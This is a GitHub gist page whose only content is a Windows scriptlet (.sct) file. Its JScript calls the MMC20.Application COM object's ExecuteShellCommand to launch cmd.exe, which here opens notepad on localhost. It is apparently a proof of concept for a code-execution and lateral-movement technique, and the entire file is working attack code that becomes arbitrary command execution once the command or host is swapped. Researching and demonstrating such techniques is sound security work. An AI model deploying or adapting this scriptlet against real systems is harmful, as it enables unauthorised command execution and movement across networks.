Skip to content

Instantly share code, notes, and snippets.

@matthiaskaiser
Created June 28, 2018 20:01
Show Gist options
  • Save matthiaskaiser/e7e75edfe431d2ecdd3159bee1ec560f to your computer and use it in GitHub Desktop.
Save matthiaskaiser/e7e75edfe431d2ecdd3159bee1ec560f to your computer and use it in GitHub Desktop.
<?xml version='1.0'?>
<package>
<component id='giffile'>
<registration
description='Dummy'
progid='giffile'
version='1.00'
remotable='True'>
</registration>
<script language='JScript'>
<![CDATA[
new ActiveXObject('MMC20.Application','localhost').Document.ActiveView.ExecuteShellCommand('cmd.exe','','/c notepad.exe','7');
]]>
</script>
</component>
</package>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment